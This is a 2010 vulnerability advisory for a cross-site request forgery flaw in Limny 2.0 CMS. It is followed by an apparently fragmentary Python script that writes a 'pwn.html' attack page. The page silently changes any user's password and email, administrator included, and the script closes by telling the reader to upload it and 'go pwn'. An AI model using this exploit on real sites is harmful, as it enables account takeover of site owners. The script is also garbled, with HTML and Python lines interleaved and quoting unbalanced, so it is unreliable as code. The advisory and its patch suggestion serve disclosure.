:Limny 2.0 Change Pass CSRF :
/Discovered By:\
|Luis Santana |
The Limny 2.0 CMS is vulnerable to a Cross-Site-Request Forgery exploit which allows for a malicious attacker to change the password, and email address, of any user, including the administrator.
Product Information
Product/Script: Limny CMS
Affected Version: 2.0
Vulnerability Type: CSRF
Security Risk: High
Vendor URL: http://www.limny.org/
Product/Script Demo: http://demo.opensourcecms.com/limny
Vendor Status: Informed
Patch/Fix Status:
Advisory Timeline: 02/16/10 : Vulnerability found, PoC created and vendor contacted
Update: Vendor has started working on patch.
Update: A Patch has been created
Advisory URL:
Product Description
Limny is a powerful, module-based and lightweight CMS. It is programmed in PHP and uses MySQL database.
Vulnerability Details
By crafting a simple hidden form webpage with a simple javascript form auto-submitter hidden inside of an iframe an attacker is able to change the password, and email address of any user.
Proof of Concept
See included .zip file for unweaponized (you need to click the "Save" button for the exploit to launch) PoC
Patch/Fix Suggestion(s)
Implementing form cookies and checking for HTTP Referer would provide an adequate means of patching this vulnerability.
Security Risk
This vulnerability is estimated to have a HIGH security risk.
The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team
Limny 2.0 Change Email & Password CSRF Exploit
Discovered By: Luis Santana
Script By: Luis Santana
Shoutz to the Evilzone.org community, Shardy, Rage, Xires and Stacy
__version__= 1.0
p = open("pwn.html", "w")
<title>Limny2.0 Change Password & Email CSRF by Luis Santana
<h1>Press Save and Pwn Away</h1>
base = str(input("What is the target website? "))
p.write('<form name="profile" action="')
p.write('''/?q=user" method="post" enctype="multipart/form-data">
password = str(input("What password do you want? "))
<td><input name="pass" type="hidden" maxlength="64" value="''')
p.write('''" /></td></tr>
<td><input name="confirmpass" type="hidden" maxlength="64" value="''')
p.write('''" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr>
<tr><td>Theme:</td><td><select name="theme"><option value="gray" selected="selected">Gray</option></select></td></tr>
<tr><td>Language:</td><td><select name="language"><option value="english" selected="selected">English</option></select></td></tr>
<td><input name="email" type="hidden" maxlength="128" value="'''
email = str(input("What email do you want? "))
p.write('" /></td></tr>')
#This will change the email address of the administrator but there is no way to get around it
p.write('''<td><input name="picture" type="hidden" value="" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr><tr><td colspan="2"><button name="submit" type="submit">Save</button></table></form>
print("pwn.html has been created successfully! Upload this file to your webserver and then go pwn")